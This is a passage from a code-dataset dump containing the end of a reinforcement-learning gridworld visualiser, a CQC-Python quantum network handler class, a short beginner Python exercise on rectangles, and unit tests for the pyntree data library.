path_enemy[i]:\n                grid.get_celld()[(path[i])].set_facecolor(LIGHT_RED)\n                grid.get_celld()[(path[i])].get_text().set_text('Caught !')\n                break\n\n    display.display(fig)\n    display.clear_output(wait=True)\n    time.sleep(1)\n","repo_name":"matheusoliveirafranca/Reinforcement-Learning","sub_path":"Bank Robbing/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":11635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27322220101","text":"import abc\nimport math\nimport logging\nimport warnings\nfrom typing import Any, List\nfrom itertools import count\n\nfrom cqc.cqcHeader import (\n    CQC_VERSION,\n    CQC_TP_COMMAND,\n    CQC_TP_GET_TIME,\n    CQC_TP_HELLO,\n    CQC_TP_DONE,\n    CQC_TP_NEW_OK,\n    CQC_TP_RECV,\n    CQC_TP_EPR_OK,\n    CQC_TP_MEASOUT,\n    CQC_TP_EXPIRE,\n    CQC_TP_INF_TIME,\n    CQC_ERR_GENERAL,\n    CQC_ERR_NOQUBIT,\n    CQC_ERR_UNSUPP,\n    CQC_ERR_TIMEOUT,\n    CQC_ERR_UNKNOWN,\n    CQC_CMD_NEW,\n    CQC_CMD_SEND,\n    CQC_CMD_EPR,\n    CQC_CMD_CNOT,\n    CQC_CMD_CPHASE,\n    CQC_CMD_ROT_X,\n    CQC_CMD_ROT_Y,\n    CQC_CMD_ROT_Z,\n    CQC_CMD_MEASURE,\n    CQC_CMD_MEASURE_INPLACE,\n    CQC_CMD_RECV,\n    CQC_CMD_EPR_RECV,\n    
CQC_CMD_ALLOCATE,\n CQC_TP_FACTORY,\n Header,\n CQCHeader,\n CQCCmdHeader,\n CQCTypeHeader,\n CQCAssignHeader,\n CQCFactoryHeader,\n CQCRotationHeader,\n CQCXtraQubitHeader,\n CQCCommunicationHeader,\n CQCType,\n)\nfrom .util import (\n CQCUnsuppError,\n CQCGeneralError,\n CQCNoQubitError,\n CQCTimeoutError,\n CQCUnknownError,\n ProgressBar,\n)\nfrom .qubit import qubit\n\n\nclass CQCHandler(abc.ABC):\n \"\"\"This class defines the things any CQCHandler must do.\n\n It is to be subclassed by the various actual classes that handle CQC, such\n as CQCConnection and CQCToFile.\n \"\"\"\n\n _appIDs = {}\n\n def __init__(self, name, app_id=None, pend_messages=False, notify=True):\n\n self.name = name\n\n # This flag is used to check if CQCConnection is opened using a 'with' statement.\n # Otherwise an deprecation warning is printed when instantiating qubits.\n self._opened_with_with = False\n\n # Set an app ID\n self._appID = self._get_new_app_id(app_id)\n\n # This is a sort of global notify\n self.notify = notify\n\n # All qubits active for this connection\n self.active_qubits = []\n\n # List of pended header objects waiting to be sent to the backend\n self._pending_headers = [] # ONLY cqc.cqcHeader.Header objects should be in this list\n\n # Bool that indicates whether we are in a factory and thus should pend commands\n self.pend_messages = pend_messages\n\n # Keep track of pending messages\n self._pending_headers = []\n\n @property\n def pend_messages(self):\n return self._pend_messages\n\n @pend_messages.setter\n def pend_messages(self, value):\n self.set_pending(value)\n\n def __str__(self):\n return \"CQC handler for node '{}'\".format(self.name)\n\n def _get_new_app_id(self, app_id):\n \"\"\"Finds a new app ID if not specific\"\"\"\n name = self.name\n if name not in self._appIDs:\n self._appIDs[name] = []\n\n # Which appID\n if app_id is None:\n for app_id in count(0):\n if app_id not in self._appIDs[name]:\n self._appIDs[name].append(app_id)\n return app_id\n else:\n if app_id in self._appIDs[name]:\n raise ValueError(\"appID={} is already in use\".format(app_id))\n self._appIDs[name].append(app_id)\n return app_id\n\n def __enter__(self):\n # This flag is used to check if CQCHandler is opened using a \n # 'with' statement.\n # Otherwise an deprecation warning is printed when instantiating\n # qubits.\n self._opened_with_with = True\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # All qubits should now be released\n self.close(release_qubits=True)\n\n @abc.abstractmethod\n def new_qubitID(self, print_cqc=False):\n \"\"\"Provide new qubit ID.\n \n This method must provide the new qubit ID. This qubit ID could \n be given by the server you are communicating with, or it might\n simply be a number that increases by one every time the method\n is used. This will depend on the type of CQCHandler being used.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_create_qubits(self, num_qubits, notify):\n \"\"\"Handles responses after allocating qubits and returns a list of qubits\"\"\"\n pass\n\n @abc.abstractmethod\n def return_meas_outcome(self):\n \"\"\"Return measurement outcome.\"\"\"\n pass\n\n @abc.abstractmethod\n def commit(self, msg):\n \"\"\"Commit a message. 
\n\n This can mean sending it to the backend or just writing to file.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_factory_response(self, num_iter, response_amount, should_notify=False):\n \"\"\"Handles the responses from a factory command and returns a list of results\"\"\"\n pass\n\n @abc.abstractmethod\n def get_remote_from_directory_or_address(self, name, **kwargs):\n \"\"\"Returns the remote address of a given node\"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_epr_response(self, notify):\n \"\"\"Waits for and handles the response message and returns a qubit object.\"\"\"\n pass\n\n @abc.abstractmethod\n def readMessage(self):\n \"\"\"Receive the whole message from cqc server.\n\n Returns (CQCHeader,None,None), (CQCHeader,CQCNotifyHeader,None) \n or (CQCHeader,CQCNotifyHeader,EntInfoHeader) depending on the \n type of message.\n \"\"\"\n pass\n\n def get_appID(self):\n \"\"\"Returns the application ID.\"\"\"\n\n return self._appID\n\n def commit_command(self, qID, command, notify=1, block=1, action=0, \n xtra_qID=0, step=0, remote_appID=0, remote_node=0, \n remote_port=0, ref_id=0):\n \"\"\"Construct and commit command.\"\"\"\n\n headers = self.construct_command_headers(\n qID, command, notify=notify, block=block, action=action, \n xtra_qID=xtra_qID, step=step, remote_appID=remote_appID, \n remote_node=remote_node, remote_port=remote_port, ref_id=ref_id)\n self.commit_headers(headers)\n\n def commit_headers(self, headers):\n \"\"\"Packs a list of headers and commits the message\"\"\"\n msg = b''\n for header in headers:\n msg += header.pack()\n self.commit(msg)\n\n def put_command(self, qID, command, read_notify=True, **kwargs):\n \"\"\"Puts a new command to be executed.\n\n If self.pend_messages is set to True, the messages are kept until flushing,\n otherwise they are commited directly.\n\n Parameters\n ----------\n qID: int\n Id of the qubit to apply the command on\n command: int\n What command to be executed\n read_notify : bool\n Whether to listen to a notify message in this function or if this is handled\n elsewhere (e.g. createEPR)\n \"\"\"\n headers = self.construct_command_headers(qID=qID, command=command, **kwargs)\n str_of_headers = \"\".join([\"\\t{}\\n\".format(header) for header in headers])\n if self.pend_messages:\n headers = self._update_headers_before_pending(headers)\n logging.debug(\"App {} pends a command with headers:\\n{}\".format(\n self.name,\n str_of_headers,\n ))\n self.pend_headers(headers)\n else:\n logging.debug(\"App {} sends a command with headers:\\n{}\".format(\n self.name,\n str_of_headers,\n ))\n self.commit_headers(headers)\n if read_notify:\n notify = kwargs.get(\"notify\", True)\n if notify:\n message = self.readMessage()\n self._assert_done_message(message)\n self.print_CQC_msg(message)\n\n def _update_headers_before_pending(self, headers):\n # Don't include the CQC Headers since this is a sequence\n return headers[1:]\n\n def _assert_done_message(self, message):\n if message[0].tp != CQC_TP_DONE:\n raise CQCUnsuppError(\n \"Unexpected message sent back from the server. 
Message: {}\".format(message[0])\n )\n\n def pend_headers(self, headers):\n \"\"\"Pends the given headers\"\"\"\n for header in headers:\n self.pend_header(header)\n \n def pend_header(self, header: Header) -> None:\n self._pending_headers.append(header)\n\n def construct_command(self, qID, command, **kwargs):\n \"\"\"Construct a commmand and packs it in it's binary form.\n\n Extra arguments are only used if the command if of a type that \n needs them.\n\n - **Arguments**\n\n :qID: qubit ID\n :command: Command to be executed, eg CQC_CMD_H\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n headers = self.construct_command_headers(qID, command, **kwargs)\n msg = b''\n for header in headers:\n msg += header.pack()\n return msg\n\n def construct_command_headers(self, qID, command, **kwargs):\n \"\"\"Construct a commmand consisting of a list of header objects.\n\n Extra arguments are only used if the command if of a type that \n needs them.\n\n - **Arguments**\n\n :qID: qubit ID\n :command: Command to be executed, eg CQC_CMD_H\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n # Construct extra header if needed.\n xtra_hdr = None\n if command == CQC_CMD_SEND or command == CQC_CMD_EPR:\n xtra_hdr = CQCCommunicationHeader()\n remote_appID = kwargs.get(\"remote_appID\", 0)\n remote_node = kwargs.get(\"remote_node\", 0)\n remote_port = kwargs.get(\"remote_port\", 0)\n xtra_hdr.setVals(remote_appID, remote_node, remote_port)\n elif command == CQC_CMD_CNOT or command == CQC_CMD_CPHASE:\n xtra_hdr = CQCXtraQubitHeader()\n xtra_qID = kwargs.get(\"xtra_qID\", 0)\n xtra_hdr.setVals(xtra_qID)\n elif (command == CQC_CMD_ROT_X or command == CQC_CMD_ROT_Y \n or command == CQC_CMD_ROT_Z):\n xtra_hdr = CQCRotationHeader()\n step = kwargs.get(\"step\", 0)\n xtra_hdr.setVals(step)\n elif command == CQC_CMD_MEASURE or command == CQC_CMD_MEASURE_INPLACE:\n xtra_hdr = CQCAssignHeader()\n ref_id = kwargs.get(\"ref_id\", 0)\n xtra_hdr.setVals(ref_id)\n\n # If xtra_hdr is None, we don't need an extra message.\n if xtra_hdr is None:\n header_length = CQCCmdHeader.HDR_LENGTH\n else:\n header_length = CQCCmdHeader.HDR_LENGTH + xtra_hdr.HDR_LENGTH\n\n # Construct Header\n hdr = CQCHeader()\n hdr.setVals(CQC_VERSION, CQC_TP_COMMAND, self._appID, header_length)\n\n # Construct Command\n cmd_hdr = CQCCmdHeader()\n notify = int(kwargs.get(\"notify\", True))\n block = int(kwargs.get(\"block\", True))\n action = int(kwargs.get(\"action\", False))\n cmd_hdr.setVals(qID, command, notify, block, action)\n\n headers = [hdr, cmd_hdr]\n if xtra_hdr is not None:\n headers.append(xtra_hdr)\n\n return headers\n\n def construct_simple(self, tp):\n \"\"\"Construct simple message.\n \n For example a HELLO message if tp=CQC_TP_HELLO.\n \"\"\"\n hdr = CQCHeader()\n hdr.setVals(CQC_VERSION, tp, self._appID, 0)\n msg = hdr.pack()\n return msg\n\n def sendSimple(self, tp):\n \"\"\"Construct and commit simple message.\"\"\"\n msg = self.construct_simple(tp)\n self.commit(msg)\n\n def close(self, release_qubits=True):\n \"\"\"Handle exiting of context.\"\"\"\n\n if release_qubits:\n for q in list(self.active_qubits):\n q.release()\n\n # Flush all remaining commands and the releases\n self.flush()\n\n self._pop_app_id()\n\n def _pop_app_id(self):\n \"\"\"\n Removes the used appID from the list.\n \"\"\"\n try:\n self._appIDs[self.name].remove(self._appID)\n except ValueError:\n pass # Already removed\n\n def create_qubits(self, num_qubits, 
block=True, notify=True):\n        \"\"\"Requests the backend to reserve some qubits\n\n        :param num_qubits: The amount of qubits to reserve\n        :param notify: Do we wish to be notified when done.\n        :param block: Do we want the qubit to be blocked\n        :return: A list of qubits\n        \"\"\"\n        notify = self.notify and notify\n\n        # TODO how to handle pending headers?\n        headers = self.construct_command_headers(\n            qID=num_qubits,\n            command=CQC_CMD_ALLOCATE,\n            notify=notify,\n            block=block,\n        )\n        self.commit_headers(headers)\n\n        qubits = self._handle_create_qubits(num_qubits=num_qubits, notify=notify)\n\n        return qubits\n\n    def sendGetTime(self, qID, notify=1, block=1, action=0):\n        \"\"\"Sends get-time message\n\n        - **Arguments**\n\n            :qID: qubit ID\n            :notify: Do we wish to be notified when done.\n            :block: Do we want the qubit to be blocked\n            :action: Are there more commands to be executed\n        \"\"\"\n        # Send Header\n        hdr = CQCHeader()\n        hdr.setVals(CQC_VERSION, CQC_TP_GET_TIME, self._appID, CQCCmdHeader.HDR_LENGTH)\n        msg = hdr.pack()\n        self.commit(msg)\n\n        # Send Command\n        cmd_hdr = CQCCmdHeader()\n        cmd_hdr.setVals(qID, 0, notify, block, action)\n        cmd_msg = cmd_hdr.pack()\n        self.commit(cmd_msg)\n\n    def allocate_qubits(self, nb_of_qubits: int) -> List['qubit']:\n        \"\"\"\n        Creates (i.e. allocates) multiple qubits, and returns a list with qubit objects.\n\n        :nb_of_qubits: The amount of qubits to be created.\n        \"\"\"\n        warnings.warn(\"allocate_qubits is deprecated, use create_qubits instead\",\n                      DeprecationWarning)\n\n        return self.create_qubits(nb_of_qubits)\n\n    def createEPR(self, name, remote_appID=0, notify=True, block=True, **kwargs):\n        \"\"\"Creates an EPR pair with another host in the network.\n\n        - **Arguments**\n\n            :name: Name of the node as specified in the cqc network config file.\n            :remote_appID: The app ID of the application running on the receiving node.\n            :notify: Do we wish to be notified when done.\n            :block: Do we want the qubit to be blocked\n        \"\"\"\n        remote_ip, remote_port = self.get_remote_from_directory_or_address(name, **kwargs)\n\n        # print info\n        logging.debug(\n            \"App {} puts message: 'Create EPR-pair with {} and appID {}'\".format(self.name, name, remote_appID)\n        )\n        notify = self.notify and notify\n        self.put_command(\n            0,\n            CQC_CMD_EPR,\n            read_notify=False,\n            notify=notify,\n            block=block,\n            remote_appID=remote_appID,\n            remote_node=remote_ip,\n            remote_port=remote_port,\n        )\n        if not self.pend_messages:\n            q = self._handle_epr_response(notify=notify)\n            return q\n\n    def recvEPR(self, notify=True, block=True):\n        \"\"\"Receives a qubit from an EPR-pair generated with another node.\n\n        - **Arguments**\n\n            :notify: Do we wish to be notified when done.\n            :block: Do we want the qubit to be blocked\n        \"\"\"\n        # print info\n        logging.debug(\"App {} puts message: 'Receive half of EPR'\".format(self.name))\n        notify = self.notify and notify\n        self.put_command(\n            qID=0,\n            command=CQC_CMD_EPR_RECV,\n            read_notify=False,\n            notify=notify,\n            block=block,\n        )\n\n        if not self.pend_messages:\n            q = self._handle_epr_response(notify=notify)\n            return q\n\n    def sendQubit(self, q, name, remote_appID=0, notify=True, block=True, **kwargs):\n        \"\"\"Sends qubit to another node in the cqc network. 
\n    \n        If this node is not in the network an error is raised.\n\n        - **Arguments**\n\n            :q: The qubit to send.\n            :name: Name of the node as specified in the cqc network config file.\n            :remote_appID: The app ID of the application running on the receiving node.\n            :notify: Do we wish to be notified when done.\n            :block: Do we want the qubit to be blocked\n        \"\"\"\n        remote_ip, remote_port = self.get_remote_from_directory_or_address(name, **kwargs)\n\n        # print info\n        logging.debug(\n            \"App {} puts message: 'Send qubit with ID {} to {} and appID {}'\".format(\n                self.name, q._qID, name, remote_appID\n            )\n        )\n        notify = self.notify and notify\n        self.put_command(\n            qID=q._qID,\n            command=CQC_CMD_SEND,\n            notify=notify, \n            block=block,\n            remote_appID=remote_appID, \n            remote_node=remote_ip,\n            remote_port=remote_port,\n        )\n        # Deactivate qubit\n        # TODO should this be done if pending messages?\n        q._set_active(False)\n\n    def recvQubit(self, notify=True, block=True):\n        \"\"\"Receives a qubit.\n\n        - **Arguments**\n\n            :notify: Do we wish to be notified when done.\n            :block: Do we want the qubit to be blocked\n        \"\"\"\n\n        # print info\n        logging.debug(\"App {} puts message: 'Receive qubit'\".format(self.name))\n        notify = self.notify and notify\n        self.put_command(0, CQC_CMD_RECV, read_notify=False, notify=notify, block=block)\n        if not self.pend_messages:\n            # Get qubit id\n            q_id = self.new_qubitID(print_cqc=True)\n\n            # initialize the qubit\n            q = qubit(self, createNew=False)\n            q._qID = q_id\n\n            # Activate and return qubit\n            q._set_active(True)\n\n            # Read the notify message\n            if notify:\n                message = self.readMessage()\n                self._assert_done_message(message)\n                self.print_CQC_msg(message)\n\n            return q\n\n    def flush(self, do_sequence=False):\n        \"\"\"Flush all pending messages to the backend.\n        \n        :param do_sequence: boolean to indicate if you want to send the pending messages as a sequence\n        :return: A list of things that are sent back from the server. Can be qubits, or outcomes\n        \"\"\"\n        return self.flush_factory(1, do_sequence)\n\n    def flush_factory(self, num_iter, do_sequence=False, block_factory=False):\n        \"\"\"\n        Flushes the current pending sequence in a factory. It is performed multiple times\n        :param num_iter: The amount of times the current pending sequence is performed\n        :return: A list of outcomes/qubits that are produced by the commands\n        \"\"\"\n        if len(self._pending_headers) == 0:\n            return []\n\n        # Initialize should_notify to False\n        should_notify = False\n\n        # Store how many of the headers we send will get a response message from the backend\n        response_amount = 0\n\n        # Loop over the pending_headers to determine the total length and set should_notify\n        for header in self._pending_headers:\n\n            # Check if the current header is a Command header. 
It can also be a sub header\n if isinstance(header, CQCCmdHeader):\n # set should_notify to True if at least one of all command headers has notify to True\n should_notify = should_notify or header.notify\n \n # Remember this header if we expect a return messge\n if self.shouldReturn(header.instr):\n response_amount += 1\n\n # Determine the CQC Header type\n if num_iter == 1:\n cqc_type = CQC_TP_COMMAND\n else:\n # Build and insert the Factory header\n cqc_type = CQC_TP_FACTORY\n factory_header = CQCFactoryHeader()\n factory_header.setVals(num_iter, should_notify, block_factory)\n # Insert the factory header at the front\n self._pending_headers.insert(0, factory_header)\n \n # Insert the cqc header\n self.insert_cqc_header(cqc_type)\n \n # Send all pending headers\n self.send_pending_headers()\n\n # Reset _pending_headers to an empty list after all headers are sent\n self.reset_pending_headers()\n\n # Read out any returned messages from the backend\n res = self._handle_factory_response(num_iter, response_amount, should_notify=should_notify)\n \n # Return information that the backend returned\n return res\n\n def send_pending_headers(self) -> List[Any]:\n \"\"\"\n Sends all pending headers.\n After sending, self._pending_headers is emptied.\n \"\"\"\n\n # Send all pending headers\n to_log = \"App {} sends a message with the following headers:\\n\".format(self.name)\n msg = b''\n for header in self._pending_headers:\n to_log += \"\\t{}\\n\".format(header)\n msg += header.pack()\n logging.debug(to_log[:-1])\n self.commit(msg)\n\n def reset_pending_headers(self):\n \"\"\"Sets the list of pending headers to empty \"\"\"\n self._pending_headers = []\n\n def set_pending(self, pend_messages):\n \"\"\"Set the pend_messages flag.\n\n If true, flush() has to be called to send all self._pending_headers in sequence to the backend\n If false, all commands are directly send to the back_end\n :param pend_messages: Boolean to indicate if messages should pend or not\n \"\"\"\n # Check if the list is not empty, give a warning if it isn't\n if self._pending_headers:\n logging.warning(\"List of pending headers is not empty, flushing them\")\n self.flush()\n self._pend_messages = pend_messages\n\n def insert_cqc_header(self, cqc_type: CQCType, version=CQC_VERSION) -> None:\n \"\"\"\n Inserts a CQC Header at index 0 of self._pending_headers.\n Invoke this method *after* all other headers are pended, so that the correct message length is calculated.\n \"\"\"\n\n # Count the total message length\n message_length = 0\n for header in self._pending_headers:\n message_length += header.HDR_LENGTH\n\n # Build the CQC Header\n cqc_header = CQCHeader()\n cqc_header.setVals(CQC_VERSION, cqc_type, self._appID, message_length)\n\n # Insert CQC Header at the front\n self._pending_headers.insert(0, cqc_header)\n\n def _pend_type_header(self, cqc_type: CQCType, length: int) -> None:\n \"\"\"\n Creates a CQCTypeHeader and pends it.\n \"\"\"\n header = CQCTypeHeader()\n header.setVals(cqc_type, length)\n self.pend_header(header)\n\n def tomography(self, preparation, iterations, progress=True):\n \"\"\"\n Does a tomography on the output from the preparation specified.\n The frequencies from X, Y and Z measurements are returned as a tuple (f_X,f_Y,f_Z).\n\n - **Arguments**\n\n :preparation: A function that takes a CQCConnection as input and prepares a qubit and returns this\n :iterations: Number of measurements in each basis.\n :progress_bar: Displays a progress bar\n \"\"\"\n accum_outcomes = [0, 0, 0]\n if progress:\n bar = 
ProgressBar(3 * iterations)\n\n # Measure in X\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n q.H()\n m = q.measure()\n accum_outcomes[0] += m\n\n # Measure in Y\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n q.K()\n m = q.measure()\n accum_outcomes[1] += m\n\n # Measure in Z\n for _ in range(iterations):\n # Progress bar\n if progress:\n bar.increase()\n\n # prepare and measure\n q = preparation(self)\n m = q.measure()\n accum_outcomes[2] += m\n\n if progress:\n bar.close()\n del bar\n\n freqs = map(lambda x: x / iterations, accum_outcomes)\n return list(freqs)\n\n def test_preparation(self, preparation, exp_values, conf=2, iterations=100, progress=True):\n \"\"\"Test the preparation of a qubit.\n Returns True if the expected values are inside the confidence interval produced from the data received from\n the tomography function\n\n - **Arguments**\n\n :preparation: A function that takes a CQCConnection as input and prepares a qubit and returns this\n :exp_values: The expected values for measurements in the X, Y and Z basis.\n :conf: Determines the confidence region (+/- conf/sqrt(iterations) )\n :iterations: Number of measurements in each basis.\n :progress_bar: Displays a progress bar\n \"\"\"\n epsilon = conf / math.sqrt(iterations)\n\n freqs = self.tomography(preparation, iterations, progress=progress)\n for i in range(3):\n if abs(freqs[i] - exp_values[i]) > epsilon:\n print(freqs, exp_values, epsilon)\n return False\n return True\n\n def print_CQC_msg(self, message):\n \"\"\"\n Prints messsage returned by the readMessage method of CQCConnection.\n \"\"\"\n # First check if there was an error\n self.check_error(message[0])\n\n hdr = message[0]\n otherHdr = message[1]\n entInfoHdr = message[2]\n\n if hdr.tp == CQC_TP_HELLO:\n logging.debug(\"CQC tells App {}: 'HELLO'\".format(self.name))\n elif hdr.tp == CQC_TP_EXPIRE:\n logging.debug(\"CQC tells App {}: 'Qubit with ID {} has expired'\".format(self.name, otherHdr.qubit_id))\n elif hdr.tp == CQC_TP_DONE:\n logging.debug(\"CQC tells App {}: 'Done with command'\".format(self.name))\n elif hdr.tp == CQC_TP_RECV:\n logging.debug(\"CQC tells App {}: 'Received qubit with ID {}'\".format(self.name, otherHdr.qubit_id))\n elif hdr.tp == CQC_TP_EPR_OK:\n\n # Lookup host name\n remote_node = entInfoHdr.node_B\n remote_port = entInfoHdr.port_B\n remote_name = None\n try:\n for node in self._cqcNet.hostDict.values():\n if (node.ip == remote_node) and (node.port == remote_port):\n remote_name = node.name\n break\n if remote_name is None:\n raise RuntimeError(\"Remote node ({},{}) is not in config-file.\".format(remote_node, remote_port))\n except AttributeError:\n remote_name = \"({}, {})\".format(remote_node, remote_port)\n\n logging.debug(\n \"CQC tells App {}: 'EPR created with node {}, using qubit with ID {}'\".format(\n self.name, remote_name, otherHdr.qubit_id\n )\n )\n elif hdr.tp == CQC_TP_MEASOUT:\n logging.debug(\"CQC tells App {}: 'Measurement outcome is {}'\".format(self.name, otherHdr.outcome))\n elif hdr.tp == CQC_TP_INF_TIME:\n logging.debug(\"CQC tells App {}: 'Timestamp is {}'\".format(self.name, otherHdr.datetime))\n\n def parse_CQC_msg(self, message, q=None, is_factory=False):\n \"\"\"\n parses the cqc message and returns the relevant value of that measure\n (qubit, measurement outcome)\n\n :param message: str\n the cqc message to be parsed\n :param q: 
:obj:`cqc.pythonLib.qubit`\n            the qubit object we should save the qubit to\n        :param is_factory: bool\n            whether the returned message came from a factory. If so, do not change the qubit, but create a new one\n        :return: the result of the message (either a qubit or a measurement outcome); otherwise None\n        \"\"\"\n        hdr = message[0]\n        otherHdr = message[1]\n        if len(message) < 3:\n            entInfoHdr = None\n        else:\n            entInfoHdr = message[2]\n\n        if hdr.tp in {CQC_TP_RECV, CQC_TP_NEW_OK, CQC_TP_EPR_OK}:\n            if is_factory:\n                q._set_active(False)  # Set qubit to inactive so it can't be used anymore\n                q = qubit(self, createNew=False)\n            if q is None:\n                q = qubit(self, createNew=False)\n            q._qID = otherHdr.qubit_id\n            q._set_entanglement_info(entInfoHdr)\n            q._set_active(True)\n            return q\n        if hdr.tp == CQC_TP_MEASOUT:\n            return otherHdr.outcome\n        if hdr.tp == CQC_TP_INF_TIME:\n            return otherHdr.datetime\n\n    def check_error(self, hdr):\n        \"\"\"Checks if there is an error returned.\"\"\"\n\n        self._errorHandler(hdr.tp)\n\n    def _errorHandler(self, cqc_err):\n        \"\"\"Raises an error if there is an error-message.\"\"\"\n\n        if cqc_err == CQC_ERR_GENERAL:\n            raise CQCGeneralError(\"General error\")\n        if cqc_err == CQC_ERR_NOQUBIT:\n            raise CQCNoQubitError(\"No more qubits available\")\n        if cqc_err == CQC_ERR_UNSUPP:\n            raise CQCUnsuppError(\"Sequence not supported\")\n        if cqc_err == CQC_ERR_TIMEOUT:\n            raise CQCTimeoutError(\"Timeout\")\n        if cqc_err == CQC_ERR_UNKNOWN:\n            raise CQCUnknownError(\"Unknown qubit ID\")\n\n    @staticmethod\n    def shouldReturn(command):\n        return command in {\n            CQC_CMD_NEW,\n            CQC_CMD_MEASURE,\n            CQC_CMD_MEASURE_INPLACE,\n            CQC_CMD_RECV,\n            CQC_CMD_EPR_RECV,\n            CQC_CMD_EPR,\n        }\n\n    @staticmethod\n    def hasXtraHeader(command):\n        return command in {\n            CQC_CMD_CNOT,\n            CQC_CMD_SEND,\n            CQC_CMD_EPR,\n            CQC_CMD_ROT_X,\n            CQC_CMD_ROT_Y,\n            CQC_CMD_ROT_Z,\n            CQC_CMD_CPHASE,\n        }\n","repo_name":"SoftwareQuTech/CQC-Python","sub_path":"cqc/pythonLib/cqc_handler.py","file_name":"cqc_handler.py","file_ext":"py","file_size_in_byte":30664,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"22505473736","text":"# Q1.\nclass Rectangle:\n    width = height = 0\n\n    def __init__(self, w, h):\n        self.width = w\n        self.height = h\n    def area_calc(self):\n        area = self.width * self.height\n        return area\n    def circum_calc(self):\n        circum = (self.width + self.height) * 2\n        return circum\n\nprint(\"Calculating the area and perimeter of a rectangle.\")\n\nw = int(input('Enter the rectangle width : '))\nh = int(input('Enter the rectangle height : '))\n\nprint('-'*25)\nrec = Rectangle(w, h)\narea = rec.area_calc()\nprint(f'Rectangle area : {area}')\n\ncircum = rec.circum_calc()\nprint(f'Rectangle perimeter : {circum}')\nprint('-'*25)\n\n\n# Q2.\nclass Scattering:\n    x = [5, 9, 1, 7, 4, 6]\n    #def __init__(self):\n","repo_name":"dbparkJ/DataScience","sub_path":"PythonBasic/Chapter06/book_q.py","file_name":"book_q.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22067880675","text":"import unittest\nfrom pyntree import Node\nfrom pyntree.file import EXTENSIONS\nimport os\nfrom datetime import datetime as dt\n\nos.chdir(\"..\")\n\nBASIC_FILES = [\n    'tests/sample.txt',\n    {'a': 1, 'b': {'c': 2}},\n    \"tests/sample.pyn\",\n    \"tests/sample.pyn.gz\",\n    \"tests/sample.json\"\n]\n\nENCRYPTED_FILES = [\n    \"tests/encrypted.pyn\",\n    \"tests/encrypted.json\",\n    \"tests/encrypted.txt\",\n    \"tests/encrypted.zip\"\n]\n\nADVANCED_FILES = [  # These hold different data, or load in different 
ways\n \"tests/node-in-node.pyn\"\n]\n\n\n# noinspection PyMethodMayBeStatic,PyUnusedLocal\nclass FileLoading(unittest.TestCase):\n def test_basic_load(self):\n for item in BASIC_FILES:\n with self.subTest(msg=str(item)):\n db = Node(item)\n\n def test_blank_load(self):\n db = Node()\n self.assertEqual(db(), {})\n\n def test_serialized_load(self):\n db = Node('tests/serialized.pyn')\n self.assertTrue(True)\n\n def test_reload_from_file(self):\n db = Node('tests/sample_reloadme.txt')\n with open('tests/sample_reloadme.txt', 'w') as file:\n file.write(\"{'a': 2}\")\n file.truncate()\n db.file.reload()\n self.assertEqual(db(), {'a': 2})\n with open('tests/sample_reloadme.txt', 'w') as file: # Reset\n file.write(\"{'a': 1}\")\n file.truncate()\n\n def test_load_new_file(self):\n for ext in EXTENSIONS:\n with self.subTest(msg=ext):\n db = Node(f'tests/newdb.{ext}')\n os.remove(f'tests/newdb.{ext}')\n\n def test_encryption(self):\n for item in ENCRYPTED_FILES:\n with self.subTest(msg=str(item)):\n db = Node(item, password=\"testing\")\n\n def test_encryption_newfile(self):\n db = Node('tests/newdb.enc', filetype='pyn', password='pyntree', salt=os.urandom(32))\n os.remove('tests/newdb.enc')\n\n\nclass FileReading(unittest.TestCase):\n def setUp(self):\n self.databases = [Node(i) for i in BASIC_FILES]\n self.databases.append(Node(ADVANCED_FILES[0]).data())\n self.databases += [Node(i, password='testing') for i in ENCRYPTED_FILES]\n\n def test_layer_0(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db(), {'a': 1, 'b': {'c': 2}})\n\n def test_layer_1(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db.a(), 1)\n self.assertEqual(db.b(), {'c': 2})\n\n def test_layer_2(self):\n for db in self.databases:\n with self.subTest(msg=db.file.filetype):\n self.assertEqual(db.b.c(), 2)\n\n def test_star_args(self):\n db = Node(BASIC_FILES[0])\n self.assertEqual(str(db.get('a', 'b')), \"[1, Node({'c': 2})]\") # str(list) -> list(*repr(item)) for some reason\n\n def test_serialized_read(self):\n db = Node('tests/serialized.pyn')\n self.assertEqual(db.time(), dt(2023, 3, 6, 21, 2, 8, 550653))\n\n\nclass FileModification(unittest.TestCase):\n def test_layer_0(self):\n db = Node({})\n db.set('a', 1)\n self.assertEqual(db.a(), 1)\n\n def test_layer_1(self):\n db = Node({'a': {}})\n db.a.set('b', {})\n self.assertEqual(db.a.b(), {})\n\n def test_layer_2(self):\n db = Node({'a': {'b': {}}})\n db.a.b.set('c', 3)\n self.assertEqual(db.a.b.c(), 3)\n\n def test_star_args(self):\n db = Node({'a': 1, 'b': 15})\n with self.subTest(msg=\"Without creation\"):\n db.set('a', 'b', 2)\n self.assertEqual(db.a(), 2)\n self.assertEqual(db.b(), 2)\n with self.subTest(msg=\"With creation\"):\n db.set('a', 'b', 'c', True)\n for item in 'abc':\n self.assertTrue(db.get(item)())\n\n def test_alternate_set(self):\n db = Node({})\n db.z = 1\n # noinspection PyCallingNonCallable\n self.assertEqual(db.z(), 1)\n\n\n# noinspection PyMethodMayBeStatic\nclass FileSaving(unittest.TestCase):\n def setUp(self):\n self.filetypes = EXTENSIONS.keys()\n\n def test_save(self):\n for ext in self.filetypes:\n with self.subTest(msg=ext):\n db = Node({'a': 1, 'b': {'c': 2}})\n db.file.switch_to_file('tests/testing_output.' + ext)\n db.save()\n 